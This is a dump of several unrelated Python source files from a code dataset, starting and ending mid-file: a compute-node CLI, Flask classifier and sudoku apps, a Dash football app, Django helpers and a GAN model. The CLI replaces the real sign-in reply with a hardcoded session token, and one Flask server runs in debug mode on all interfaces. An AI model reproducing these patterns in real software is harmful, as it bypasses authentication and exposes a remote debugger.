Cheers!')\n                return\n            else:\n                # network. NOTE: the hardcoded response below overrides the real network reply (debug stub).\n                response = networking.node_network(instance_owner.email, password1)\n                response = {}\n                response[\"node\"] = {}\n                response[\"node\"][\"session\"] = \"f268471e598bf5acd768871b169d274b025bf8b62eb388585d27ac00911f036b\"\n                response[\"owner\"] = {}\n                response[\"owner\"][\"fname\"] = \"Faical Yannick\"\n                response[\"owner\"][\"lname\"] = \"Congo\"\n                response[\"owner\"][\"rewards\"] = 1000\n                if response is None:\n                    xprint('Node', 'err', 'Error: could not sign in the RRC network.')\n                else:\n                    session = storing.hook(\"Node\")\n\n                    instance_owner = session.query(Owner).first()\n                    instance_owner.fname = response['owner']['fname']\n                    instance_owner.lname = response['owner']['lname']\n                    instance_owner.rewards = response['owner']['rewards']\n\n                    current_node = session.query(Instance).first()\n                    current_node.session = response['node']['session']\n\n                    session.commit()\n                    current_node = session.query(Instance).first()\n                    # if current_node.component_networking:\n                    #     storing.release(\"Node\")\n                    #     xprint('Node', 'warn', 'Warning: Running networking component found!')\n                    #     xprint('Node', 'inf', 'Info: Only one networking component allowed to run at a time.')\n                    # else:\n                    current_node.status = \"running\"\n                    session.commit()\n\n                    storing.release(\"Node\")\n                    # Launch the network daemon.\n                    xprint('Node', 'inf', 'Networking component starting up...')\n                    pid1 = networking.start()\n                    # Save pid into current_node component networking.\n                    xprint('Node', 'warn', pid1)\n                    # Launch the computing daemon.\n                    xprint('Node', 'inf', 'Computing component starting up...')\n                    pid2 = computing.start()\n                    # Save pid into current_node component computing.\n                    xprint('Node', 'warn', pid2)\n        else:\n            # Localhost.\n            # Launch the computing Thread.\n            # Configure computing.\n            session = storing.hook(\"Node\")\n            current_node = session.query(Instance).first()\n            # if current_node.component_computing:\n            #     storing.release(\"Node\")\n            #     xprint('Node', 'warn', 'Warning: Running computing component found!')\n            #     xprint('Node', 'inf', 'Info: Only one computing component allowed to run at a time.')\n            # else:\n            current_node.status = \"running\"\n            session.commit()\n            storing.release(\"Node\")\n            # Launch the computing daemon.\n            xprint('Node', 'inf', 'Computing component starting up...')\n            pid = computing.start()\n\n    if stop:\n        xprint('Node', 'warn', 'You are about to stop this RRC node.')\n        sure = input(\"Do you really want to proceed: (y)es | (n)o ? \")\n        if sure.lower() == \"y\":\n            session = storing.hook(\"Node\")\n            current_node = session.query(Instance).first()\n            status = current_node.status\n            session.commit()\n            storing.release(\"Node\")\n            if status != \"stopped\":\n                session = storing.hook(\"Node\")\n                current_node = session.query(Instance).first()\n                current_node.status = \"stopping\"\n                session.commit()\n                if not current_node.localhost:\n                    networking.connect()\n                    storing.connect()\n                storing.release(\"Node\")\n                session = storing.hook(\"Node\")\n                current_node = session.query(Instance).first()\n                current_node.status = \"stopped\"\n                session.commit()\n                storing.release(\"Node\")\n                xprint('Node', 'inf', 'This RRC Node stopped')\n        elif sure.lower() == \"n\":\n            xprint('Node', 'warn', 'Well understood. Cheers!')\n        else:\n            xprint('Node', 'warn', 'Warning: Unknown answer. 
(y)es/(n)o.')\n\n\n@cmd.command()\n@click.option('--queu/--no-queu', default=None, help=\"Show the summary of the contracts queu on the node.\")\n@click.option('--show', default=None, help=\"Show details of a specific contract from its id.\")\n@click.option('--page', default=1, help=\"Paginate the contracts display.\")\n@click.option('--submit', default=None, help=\"Submit a contract to a localhost instance.\")\n@click.option('--cancel', default=None, help=\"Cancel a contract on a localhost instance.\")\n@click.option('--clean/--no-clean', default=None, help=\"Wipe all the contracts.\")\n@click.option('--debug/--no-debug', default=None, help=\"Show debug logs.\")\n# Before going on the network the localhost instance has to be wiped clean.\n# Same thing before starting a localhost from a network instance.\ndef contract(queu, show, page, submit, cancel, clean, debug):\n    if debug:\n        _debug = True\n    xprint('Node', 'deb', 'Entering the cli contract command...')\n    storing = Storing()\n    networking = Networking()\n    computing = Computing()\n    networking.link_storage(storing)\n    computing.link_storage(storing)\n\n    session = storing.hook(\"Node\")\n    current_node = session.query(Instance).first()\n\n    current_node.status = \"stopping\"\n    session.commit()\n\n    if not current_node.localhost:\n        networking.connect()\n        storing.connect()\n    storing.release(\"Node\")\n\n    if queu:\n        xprint('Node', 'deb', 'Pretty Table of the queu.')\n        computing.queu()\n\n    elif show:\n        xprint('Node', 'deb', 'Showing a specific contract.')\n        computing.show(show)\n\n    elif submit:\n        xprint('Node', 'deb', 'Submitting a contract.')\n        computing.submit(submit)\n\n    elif cancel:\n        xprint('Node', 'deb', 'Requesting node to cancel a contract.')\n        computing.cancel(cancel)\n\n    elif clean:\n        # Submit only works in localhost, or online when the components are off the network.\n        xprint('Node', 'warn', 'You are about to erase all your workload.')\n        sure = input(\"Do you really want to proceed: (y)es | (n)o ? \")\n        if sure.lower() == \"y\":\n            session = storing.hook(\"Node\")\n            current_queu = session.query(Queu).all()\n            current_contracts = session.query(Contract).all()\n            for qu in current_queu:\n                session.delete(qu)\n            for cnt in current_contracts:\n                session.delete(cnt)\n            session.commit()\n            storing.release(\"Node\")\n        elif sure.lower() == \"n\":\n            xprint('Node', 'warn', 'Well understood. Cheers!')\n        else:\n            xprint('Node', 'warn', 'Warning: Unknown answer. 
(y)es/(n)o.')\n    else:\n        xprint('Node', 'deb', 'Pretty Table of the contracts.')\n        computing.contracts(page)\n\n@cmd.command()\n@click.option('--summary/--no-summary', default=None, help=\"Show the summary of the latest events stored.\")\n@click.option('--page', default=None, help=\"Show the summary of the events on a specific page.\")\n@click.option('--show', default=None, help=\"Show the details of a specific event.\")\n@click.option('--clean/--no-clean', default=None, help=\"Wipe all the events.\")\n@click.option('--filter', default=None, help=\"Filter the events list based on keywords.\")\n@click.option('--export', default='json', type=click.Choice(['json', 'yaml', 'xml', 'txt']), help=\"Export a list of events to a specific format.\")\n@click.option('--email', default=None, help=\"Email a list of events.\")\n@click.option('--debug/--no-debug', default=None, help=\"Show debug logs.\")\ndef history(summary, page, show, clean, filter, export, email, debug):\n    if debug:\n        _debug = True\n    xprint('Node', 'deb', 'Entering the cli history command...')\n\nif __name__ == '__rrc.main__':\n    cmd()\n","sub_path":"rrc/main/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":27059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"579248474","text":"import os, io, pickle, re, glob, argparse\nimport pandas as pd\nfrom functions import new_nn_learning, nn_updating_new_data\nfrom flask import Flask, request, Response, send_file, make_response\n\napp = Flask(__name__)\n\n#страница загрузки\n@app.route('/')\ndef index():\n return send_file(os.path.join(data_rout, 'file_loading_form.html'))\n\n# Страница, куда постим CSV файл для обработки\n@app.route('/', methods=[ 'POST' ])\ndef nn_lerning():\n #выгрузим размеченные тексты\n file = request.files['f']\n ds = pd.DataFrame(pd.read_csv(file))\n\n #отберем те классы примеров, для которых есть модели:\n tag_nums = []\n for fn in glob.glob(os.path.join(model_rout, '*.h5')):\n tag_num = re.findall('\\d*_', fn)\n if tag_num !=[]:\n tag_nums.append(re.sub('_', '', tag_num[0]))\n\n\n #выберем те тексты, для которых моделей нет и модели по которым надо будет создать и обучить:\n txts_for_initial_learning_df = ds[~ds['lbs'].isin(tag_nums)]\n #выберем те тексты, по которым надо будет модели дообучить:\n txts_for_adding_learning_df = ds[ds['lbs'].isin(tag_nums)]\n\n print(txts_for_adding_learning_df[txts_for_adding_learning_df['lbs'].isin([6, 13])])\n set(list(txts_for_adding_learning_df['lbs']))\n\n #создадим модели для классов, по которым еще нет моделей:\n new_nn_learning(model_rout, data_rout, dict_rout, txts_for_initial_learning_df, nn_epochs=3)\n\n #дообучим модели по классам, по которым модели уже существуют:\n df_test = txts_for_adding_learning_df[txts_for_adding_learning_df['lbs'].isin([6, 13])]\n nn_updating_new_data(df_test, model_rout, nn_epochs=3)\n \n mf = io.BytesIO()\n #mf = io.StringIO()\n mf.write('I have done job!'.encode('utf-8'))\n mf.seek(0)\n \n return send_file(mf, attachment_filename='report.txt', as_attachment=True)\n\nif __name__ == '__main__':\n parser=argparse.ArgumentParser(description='Классификатор')\n parser.add_argument('--host', dest='host', default='0.0.0.0')\n parser.add_argument('--port', dest='port', default=5001)\n args=parser.parse_args()\n global model_rout\n model_rout = r'./models'\n global data_rout\n data_rout = r'./data/'\n global dict_rout\n dict_rout = r'./dicts'\n \n app.run(debug=True, host=args.host, port=int(args.port))","sub_path":"draft/abc_flask_serv.py","file_name":"abc_flask_serv.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"560978924","text":"import os\nimport uuid\nimport logging\nimport subprocess\n\nfrom flask import Flask, request, redirect, url_for, render_template\nfrom werkzeug.utils import secure_filename\nfrom werkzeug.datastructures import FileStorage\nfrom sudoku_solver import sudoku_solver\n\n\nlogging.basicConfig(\n format=\"%(asctime)s %(levelname)s - %(message)s\",\n level=logging.INFO,\n datefmt='%Y-%m-%d %H:%M:%S'\n)\n\nUPLOAD_FOLDER = \"./static/uploads/\"\nALLOWED_EXTENSIONS = {\"png\", \"jpg\", \"jpeg\"}\n\napplication = Flask(__name__)\napplication.config[\"UPLOAD_FOLDER\"] = UPLOAD_FOLDER\napplication.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024 # Limit to 16MB\n\n\ndef _allowed_file(filename: str) -> bool:\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\ndef _randomise_file_name(f: FileStorage) -> str:\n filename_with_extension = secure_filename(f.filename)\n extension = os.path.splitext(filename_with_extension)[1]\n\n randomised_filename = str(uuid.uuid4())\n\n return randomised_filename + extension\n\n\n@application.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n if request.method == \"POST\":\n f = request.files[\"file\"]\n\n if f and _allowed_file(f.filename):\n filename = _randomise_file_name(f)\n logging.info(f\"Received file {filename}\")\n\n f.save(os.path.join(application.config[\"UPLOAD_FOLDER\"], filename))\n\n parsed_text = \"\\n\" + subprocess.run(\n [\"./sudoku_parser\", \"./static/uploads/\" + filename],\n stdout=subprocess.PIPE).stdout.decode('utf-8')\n\n logging.info(f\"Parsed text: {parsed_text}\")\n\n solution = sudoku_solver(parsed_text)\n\n logging.info(f\"Solution: {solution}\")\n\n # Join to a single string for putting into the template\n solution = ''.join(str(item) for innerlist in solution for item in innerlist)\n\n return redirect(url_for(\n \"index\", solution=solution, filename=\"uploads/\" + filename))\n\n if request.method == \"GET\":\n filename = request.args.get(\"filename\", default=\"\", type=str)\n solution = request.args.get(\"solution\", default=\"\", type=str)\n\n return render_template(\"index.html\", solution=solution, filename=filename)\n\n\nif __name__ == \"__main__\":\n application.run(host=\"0.0.0.0\")\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"390675848","text":"import unittest\nfrom survey import AnonymousSurvey \n\nclass TestAnonymousSurvey(unittest.TestCase):\n\t\"\"\"Tests for the class AnonymousSurvey\"\"\"\n\n\tdef setUp(self):\n\t\t\"\"\"Creat a survey and a set of responses for use in all test methods\"\"\"\n\t\tquestion = \"What language did you first learn to speak ?\"\n\t\tself.my_survey = AnonymousSurvey(question)\n\t\tself.responses = ['English','Spanish','French']\n\n\tdef test_store_single_response(self):\n\t\t\"\"\"Test that a single response is stored properly\"\"\"\n\t\tself.my_survey.store_responses('English')\n\t\tself.assertIn('English',self.my_survey.responses)\n\n\tdef test_three_store_responses(self):\n\t\t\"\"\"Test for three responses\"\"\"\n\t\t\n\t\tfor response in self.responses:\n\t\t\tself.my_survey.store_responses(response)\n\n\t\tfor response in self.responses:\n\t\t\tself.assertIn(response,self.my_survey.responses)\n\n\t\t\n\nif __name__ == '__main__':\n\tunittest.main()\n\n\n","sub_path":"src/chapter09/test_survey.py","file_name":"test_survey.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"12421523","text":"import dash\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output\r\nimport plotly.graph_objs as go\r\nimport base64\r\nimport pandas as pd\r\nimport pitch_plotly as pitch\r\nimport numpy as np\r\nimport ds4d as machine\r\nfrom app import app\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\npath = 'C:\\\\Users\\\\iq10189\\\\Desktop\\\\University_of_Edinburgh\\\\Data Science for Design\\\\FIFA\\\\DS4D\\\\data\\\\dataset.csv'\r\noriginal_data = pd.read_csv(path, sep=';' , decimal=',')\r\nteams = original_data.sort_values('team')['team'].unique()\r\n######Fitting Classification algorithm\r\ny = original_data.loc[:,'cluster'] \r\nx = original_data.loc[:,'C1':'Y11']\r\nsplit = np.rint(0.8*x.shape[0])\r\nX_clean_train = x[:int(split)].values\r\nX_clean_val = x[int(split):].values\r\ny_train = y[:int(split)]\r\ny_val = y[int(split):]\r\nlogreg = LogisticRegression(solver='lbfgs')\r\nlogreg.fit(X_clean_train, y_train)\r\n#####\r\ndemo_dict={}\r\nold_form={}\r\nML=[]\r\nfor i in range(0,11):\r\n\tML.append([])\r\n\t\r\nlayout = html.Div([\r\n\thtml.Div([\r\n\t\thtml.Div([\r\n\t\t\thtml.Div([\r\n\t\t\t\thtml.Label(\"Choose your Team\"),\r\n\t\t\t\tdcc.Dropdown(\r\n\t\t\t\t\tid='Team_for_Formation',\r\n\t\t\t\t\toptions=[{'label':i,'value':i} for i in teams],\r\n\t\t\t\t\tvalue = 'Spain')\r\n\t\t\t\t],\r\n\t\t\t\tstyle={'width': '32%', 'display': 'inline-block'}),\r\n\t\t\thtml.Div([\r\n\t\t\t\thtml.Label(\"Pick a Cluster\"),\r\n\t\t\t\tdcc.Dropdown(id=\"Cluster_for_Formation\",\r\n\t\t\t\tvalue=1)\r\n\t\t\t\t],\r\n\t\t\tstyle={'width': '32%', 'display': 'inline-block'}),\r\n\t\t\thtml.Div([\r\n\t\t\t\thtml.Label(\"Pick a Game\"),\r\n\t\t\t\tdcc.Dropdown(id=\"Game_for_Formation\",\r\n\t\t\t\tvalue=588)\r\n\t\t\t\t],\r\n\t\t\tstyle={'width': '32%', 'display': 'inline-block'}),\r\n\t\t\t]),\r\n\t\thtml.Div([\r\n\t\t\tdcc.Graph(id='Football_Pitch_Mul',config={'displayModeBar': False})],\r\n\t\tstyle={'width': '48%','display': 'inline-block'}),\t\r\n\thtml.Div([\t\r\n\t\thtml.Label(\"Select a Player\"),\r\n\t\tdcc.Dropdown(\r\n\t\t\tid = 'Player',\r\n\t\t\toptions =[{'label':\"Player %s\"%i, 'value':i} for i in range(1,12)],\r\n\t\t\tvalue=1),\r\n\t\thtml.Label(\"Modify X Position\"),\r\n\t\tdcc.Slider(\r\n\t\t\tid='X_slider',\r\n\t\t\tmin=0,\r\n\t\t\tmax=100,\r\n\t\t\tstep=0.1),\r\n\t\thtml.Label(\"Modify Y position\"),\r\n\t\tdcc.Slider(\r\n\t\t\tid='Y_slider',\r\n\t\t\tmin=0,\r\n\t\t\tmax=100,\r\n\t\t\t#marks={i*10:str(i*10) for i in range(1,11)},\r\n\t\t\tstep=0.1),\r\n\t\thtml.Label(\"Modify Betweenness\"),\r\n\t\tdcc.Slider(\r\n\t\t\tid='Bet_slider',\r\n\t\t\tmin=0,\r\n\t\t\tmax=1,\r\n\t\t\t#marks={i/10:str(i/10) for i in range(1,11)},\r\n\t\t\tstep=0.001),\r\n\t\thtml.Label(\"Modify Closeness\"),\r\n\t\tdcc.Slider(\r\n\t\t\tid='Clo_slider',\r\n\t\t\tmin=0,\r\n\t\t\tmax=10,\r\n\t\t\t#marks={i:str(i) for i in range(1,11)},\r\n\t\t\tstep=0.01),\r\n\t\t\thtml.Button(id ='submit',n_clicks=0, children=\"Submit Player\")],\r\n\t\tstyle={'width': '50%','display': 'inline-block'}),\r\n\t]),\r\n\thtml.Div([\r\n\t\thtml.Div([\r\n\t\t\tdcc.Graph(id=\"Football_Pitch\"),\r\n\t\t\thtml.Button(id=\"submit_team\",n_clicks=0, children=\"Submit New Formation\")],\r\n\t\tstyle={'width': '50%','display': 'inline-block'}),\r\n\t\thtml.Div(id='print',\r\n\t\tstyle={'width': '50%','display': 
'inline-block'}),\r\n\t])\r\n\t\r\n])\r\n\r\n#Dropdowns\r\n@app.callback(\r\n\tdash.dependencies.Output('Cluster_for_Formation','options'),\r\n\t[dash.dependencies.Input('Team_for_Formation', 'value')])\r\ndef set_cluster_options(selected_team):\r\n\tavail_clus=original_data.loc[original_data['team']==selected_team]['cluster'].unique()\r\n\treturn [{'label': i, 'value': i} for i in avail_clus]\r\n@app.callback(\r\n\tdash.dependencies.Output('Game_for_Formation','options'),\r\n\t[dash.dependencies.Input('Team_for_Formation', 'value'),\r\n\tdash.dependencies.Input('Cluster_for_Formation', 'value')])\r\ndef set_game_options(selected_team,selected_cluster):\r\n\tavail_games=original_data.loc[(original_data['team']==selected_team) &(original_data['cluster']==selected_cluster)]\r\n\treturn [{'label': i+1, 'value': j} for i,j in enumerate(avail_games.index)]\r\n\t\r\n#Figure 2\r\n@app.callback(\r\n\tdash.dependencies.Output('Football_Pitch_Mul', 'figure'),\r\n\t[dash.dependencies.Input('Game_for_Formation', 'value')])\r\ndef update_graph_Field(game):\r\n\tglobal demo_dict,ML\r\n\tdemo_dict={}\r\n\ttitle = 'Initial Formation'\r\n\tplotter = pitch.Plotter(title)\r\n\tdemo_arr=[]\r\n\ttemp_frame = original_data.iloc[game]\r\n\tfor i in range(1,12):\r\n\t\tplayer=[temp_frame['X%s' %i],temp_frame['Y%s' %i],\\\r\n\t\t'Player %s' %i,15]\r\n\t\tML[i-1]=[temp_frame['C%s' %i],temp_frame['B%s' %i],temp_frame['X%s' %i],temp_frame['Y%s' %i]]\r\n\t\tdemo_arr.append(player)\r\n\tplotter.add_events(demo_arr)\r\n\tdata, layout = plotter.plot()\r\n\treturn {'data': data, 'layout': layout}\t\r\n\r\n###X function\r\n@app.callback(\r\n\tdash.dependencies.Output('X_slider','value'),\r\n\t[dash.dependencies.Input('Player', 'value'),\r\n\tdash.dependencies.Input('Game_for_Formation', 'value')])\r\ndef set_X_initial(player,game):\r\n\ttemp_frame = original_data.iloc[game]\r\n\tmean = temp_frame['X%s'%player]\r\n\treturn mean\r\n\r\n@app.callback(\r\n\tdash.dependencies.Output('X_slider','min'),\r\n\t[dash.dependencies.Input('Player', 'value')])\r\ndef set_clusterA_options(player):\r\n\tmin=original_data['X%s'%player].min()\r\n\treturn min\r\n\t\r\n@app.callback(\r\n\tdash.dependencies.Output('X_slider','max'),\r\n\t[dash.dependencies.Input('Player', 'value')])\r\ndef set_clusterA_options(player):\r\n\tmax=original_data['X%s'%player].max()\r\n\treturn max\r\n\t\r\n###Y functions\r\n@app.callback(\r\n\tdash.dependencies.Output('Y_slider','value'),\r\n\t[dash.dependencies.Input('Player', 'value'),\r\n\tdash.dependencies.Input('Game_for_Formation', 'value')])\r\ndef set_clusterA_options(player,game):\r\n\ttemp_frame=original_data.iloc[game]\r\n\tmean = temp_frame['Y%s'%player]\r\n\treturn mean\r\n\r\n@app.callback(\r\n\tdash.dependencies.Output('Y_slider','min'),\r\n\t[dash.dependencies.Input('Player', 'value')])\r\ndef set_clusterA_options(player):\r\n\tmin=original_data['Y%s'%player].min()\r\n\treturn min\r\n\t\r\n@app.callback(\r\n\tdash.dependencies.Output('Y_slider','max'),\r\n\t[dash.dependencies.Input('Player', 'value')])\r\ndef set_clusterA_options(player):\r\n\tmax=original_data['Y%s'%player].max()\r\n\treturn max\r\n###Between\r\n@app.callback(\r\n\tdash.dependencies.Output('Bet_slider','value'),\r\n\t[dash.dependencies.Input('Player', 'value'),\r\n\tdash.dependencies.Input('Game_for_Formation', 'value')])\r\ndef set_clusterA_options(player,game):\r\n\ttemp_frame = original_data.iloc[game]\r\n\tmean = temp_frame['B%s'%player]\r\n\treturn 
mean\r\n\r\n@app.callback(\r\n\tdash.dependencies.Output('Bet_slider','min'),\r\n\t[dash.dependencies.Input('Player', 'value')])\r\ndef set_clusterA_options(player):\r\n\tmin=original_data['B%s'%player].min()\r\n\treturn min\r\n\t\r\n@app.callback(\r\n\tdash.dependencies.Output('Bet_slider','max'),\r\n\t[dash.dependencies.Input('Player', 'value')])\r\ndef set_clusterA_options(player):\r\n\tmax=original_data['B%s'%player].max()\r\n\treturn max\r\n\r\n###Close\t\r\n@app.callback(\r\n\tdash.dependencies.Output('Clo_slider','value'),\r\n\t[dash.dependencies.Input('Player', 'value'),\r\n\tdash.dependencies.Input('Game_for_Formation', 'value')])\r\ndef set_clusterA_options(player,game):\r\n\ttemp_frame = original_data.iloc[game]\r\n\tmean = temp_frame['C%s'%player]\r\n\treturn mean\r\n\r\n@app.callback(\r\n\tdash.dependencies.Output('Clo_slider','min'),\r\n\t[dash.dependencies.Input('Player', 'value')])\r\ndef set_clusterA_options(player):\r\n\tmin=original_data['C%s'%player].min()\r\n\treturn min\r\n\t\r\n@app.callback(\r\n\tdash.dependencies.Output('Clo_slider','max'),\r\n\t[dash.dependencies.Input('Player', 'value')])\r\ndef set_clusterA_options(player):\r\n\tmax=original_data['C%s'%player].max()\r\n\treturn max\r\n\t\r\n\t\r\n@app.callback(\r\n\tdash.dependencies.Output('Football_Pitch', 'figure'),\r\n\t[dash.dependencies.Input('submit', 'n_clicks')],\r\n\t[dash.dependencies.State('Game_for_Formation', 'value'),\r\n\tdash.dependencies.State('Player', 'value'),\r\n\tdash.dependencies.State('X_slider', 'value'),\r\n\tdash.dependencies.State('Y_slider', 'value'),\r\n\tdash.dependencies.State('Clo_slider', 'value'),\r\n\tdash.dependencies.State('Bet_slider', 'value')])\r\ndef update_graph_Field(click,game,player1,X,Y,C,B):\r\n\ttitle = 'New Formation'\r\n\tglobal ML\r\n\tplotter = pitch.Plotter(title)\r\n\ttemp_frame = original_data.iloc[game]\r\n\tfor i in range(1,12):\r\n\t\tplayer=[temp_frame['X%s' %i],temp_frame['Y%s' %i],\\\r\n\t\t'Player %s' %i,15]\r\n\t\tML[i-1]=[temp_frame['C%s' %i],temp_frame['B%s' %i],temp_frame['X%s' %i],temp_frame['Y%s' %i]]\r\n\t\told_form[i]=player\r\n\tif click==0:\r\n\t\tplotter.add_events_dict(old_form,u'Black')\r\n\t\tdata, layout = plotter.plot()\r\n\t\treturn {'data': data, 'layout': layout}\r\n\r\n\tif click>0:\r\n\t\tname='Player %s' %player1\r\n\t\tplayer = [X,Y,name,15]\r\n\t\tML[player1-1] = [C,B,X,Y]\r\n\t\tdemo_dict[player1]=player\r\n\t\t[old_form.pop(key) for key in list(demo_dict.keys())] \r\n\t\tplotter.add_events_dict(demo_dict,u'Red')\r\n\tplotter.add_events_dict(old_form,u'Black')\r\n\tdata, layout = plotter.plot()\r\n\treturn {'data': data, 'layout': layout}\r\n\r\n@app.callback(\r\n\tdash.dependencies.Output('print', 'children'),\r\n\t[dash.dependencies.Input(\"submit_team\", 'n_clicks')])\r\ndef update_output(clicks):\r\n\tif any(len(elem) == 0 for elem in ML) and clicks > 0:\r\n\t\treturn 'Please submit 11 players first'\r\n\tClose, Between, X, Y = zip(*ML)\r\n\tClose=np.asarray(Close)\r\n\tBetween=np.asarray(Between)\r\n\tX=np.asarray(X)\r\n\tY=np.asarray(Y)\r\n\tdata = np.concatenate((Close,Between,X,Y),axis=None).T\r\n\ta=logreg.predict([data])[0]\r\n\treturn str(a)\t\r\n\r\n","sub_path":"Interactive application/apps/Toy_Example.py","file_name":"Toy_Example.py","file_ext":"py","file_size_in_byte":9076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"125914726","text":"import xlwt\nimport csv\nimport pandas as pd\nfrom io import BytesIO, StringIO\nfrom django.http import HttpResponse\nfrom django.utils.encoding import smart_str\n\ndef export_to_xls(data,file_name,sheet_name,columns):\n print(columns,'cc',file_name,sheet_name,data)\n response = HttpResponse(content_type='application/ms-excel')\n response['Content-Disposition'] = 'attachment; filename='+file_name\n\n wb = xlwt.Workbook(encoding='utf-8')\n ws = wb.add_sheet(sheet_name)\n\n # Sheet header, first row\n row_num = 0\n\n font_style = xlwt.XFStyle()\n font_style.font.bold = True\n print(columns,'c--')\n columns = columns\n\n for col_num in range(len(columns)):\n ws.write(row_num, col_num, columns[col_num], font_style)\n\n # Sheet body, remaining rows\n font_style = xlwt.XFStyle()\n\n rows = data\n for row in rows:\n row_num = row_num + 1\n print(row,'ro')\n ws.write(row_num, 0, row['row'], font_style)\n ws.write(row_num, 1, row['column name'], font_style)\n ws.write(row_num, 2, row['message'], font_style)\n # ws.write(row_num, 3, row.notes, font_style) \n\n wb.save(response)\n return response\n\n\ndef export_to_csv(data,file_name,columns):\n print('csv')\n response = HttpResponse(content_type='text/csv')\n\t#decide the file name\n response['Content-Disposition'] = 'attachment; filename='+file_name\n\n writer = csv.writer(response, csv.excel)\n response.write(u'\\ufeff'.encode('utf8'))\n\n\t#write the headers\n writer.writerow([\n\t\tsmart_str(u\"row\"),\n\t\tsmart_str(u\"column name\"),\n\t\tsmart_str(u\"message\"),\n\t])\n\t#get data from database or from text file....\n events = data #dummy function to fetch data\n for event in events:\n print(events,'eeee')\n writer.writerow([\n\t\t\tsmart_str(event['row']),\n\t\t\tsmart_str(event['column name']),\n\t\t\tsmart_str(event['message'])\n\t\t])\n return response\n\n\ndef export_to_excel_by_io(data,sheet_name):\n sio = BytesIO()\n pd_df = pd.DataFrame(data)\n pdwrt = pd.ExcelWriter(sio, engine='xlsxwriter') \n pd_df.to_excel(pdwrt, sheet_name=sheet_name)\n pdwrt.save()\n sio.seek(0)\n workbook = sio.getvalue()\n response = HttpResponse(workbook, content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n # set the file name in the Content-Disposition header\n response['Content-Disposition'] = 'attachment; filename=myError.xlsx'\n return response","sub_path":"file_export/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"149406506","text":"from django.db import models\nfrom homework.models import Homework\nfrom classlists.models import Klass\n\nfrom datetime import date\n\nSUBJECT_CHOICES = (\n ('Language','Language'),\n ('Math','Math'),\n ('Science','Science'),\n ('French','French'),\n ('Visual Art','Visual Art'),\n ('Phys Ed.','Phys Ed.'),\n ('Geography','Geography'),\n ('History','History'),\n ('Drama','Drama'),\n ('Dance','Dance'),\n ('Media','Media'), \n ('Music','Music'), \n ('Health','Health'),\n ('Library','Library'),\n ('Misc','Misc.'),\n )\n \nclass Link(models.Model):\n\tlink=models.URLField()\n\tdescription=models.CharField(max_length=30)\n\thomework=models.ForeignKey(Homework, blank=True, null=True)\n\tklass=models.ManyToManyField(Klass, blank=False)\n\tsubject=models.CharField(max_length=10,choices=SUBJECT_CHOICES, blank=True, null=True)\n\t\n\tdef __unicode__(self):\n\t\treturn '%s %s' %(self.description, self.link)\n\n","sub_path":"links/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"640120244","text":"import os\nimport numpy as np\nfrom collections import OrderedDict\nimport math\nimport matplotlib\n\nimport matplotlib.pyplot as plt\nimport PIL.Image as Image\n\nimport torch\n\nfrom models.base_model import BaseModel\nfrom models.modules.base_module import ModuleFactory\nimport utils.util as util\nfrom models.modules.vgg import VGG16FeatureExtractor\n\n\nclass FOAFCGAN_alternate_training(BaseModel):\n\n def __init__(self, opt):\n\n super(FOAFCGAN_alternate_training, self).__init__(opt)\n\n self._name = 'FOAFCGAN_alternate_training_1'\n\n self._init_create_networks()\n\n if self._is_train:\n self._init_train_vars()\n\n if not self._is_train or self._opt.load_epoch > 0:\n self.load()\n\n self._init_prefetch_inputs()\n\n self._init_losses()\n \n\n def _init_create_networks(self):\n\n self._G = self._create_generator()\n self._G.init_weights()\n self._G = torch.nn.DataParallel(self._G, device_ids=[0])\n\n self._D = self._create_discriminator()\n self._D.init_weights()\n self._D = torch.nn.DataParallel(self._D, device_ids=[0])\n\n self._vgg = VGG16FeatureExtractor()\n self._vgg = torch.nn.DataParallel(self._vgg, device_ids=[0])\n\n def _create_generator(self):\n return ModuleFactory.get_by_name('generator_wgan')\n\n def _create_discriminator(self):\n return ModuleFactory.get_by_name('discriminator_wgan_cls')\n\n def _init_train_vars(self):\n\n self._current_lr_G = self._opt.lr_G\n self._current_lr_D = self._opt.lr_D\n\n self._optimizer_G = torch.optim.Adam(self._G.parameters(), lr=self._current_lr_G,\n betas=[self._opt.G_adam_b1, self._opt.G_adam_b2])\n self._optimizer_D = torch.optim.Adam(self._D.parameters(), lr=self._current_lr_D,\n betas=[self._opt.D_adam_b1, self._opt.D_adam_b2])\n\n def _init_prefetch_inputs(self):\n\n self._input_img_occ = \\\n self._Tensor(self._opt.batch_size, 3, self._opt.image_size, self._opt.image_size)\n self._input_occ_attr = \\\n self._Tensor(self._opt.batch_size, self._opt.attr_nc)\n\n self._input_img_none_occ = \\\n self._Tensor(self._opt.batch_size, 3, self._opt.image_size, self._opt.image_size)\n self._input_none_occ_attr = \\\n self._Tensor(self._opt.batch_size, self._opt.attr_nc)\n\n self._input_img_none_occ_adv = \\\n self._Tensor(self._opt.batch_size, 3, self._opt.image_size, self._opt.image_size)\n self._input_none_occ_attr_adv = \\\n self._Tensor(self._opt.batch_size, self._opt.attr_nc)\n\n def _init_losses(self):\n\n self._compute_loss_l1 = torch.nn.L1Loss()\n self._compute_loss_attr = torch.nn.MSELoss()\n\n # real and fake occluded face image loss\n self._loss_g_mask = self._Tensor([0])\n self._loss_g_masked_fake = 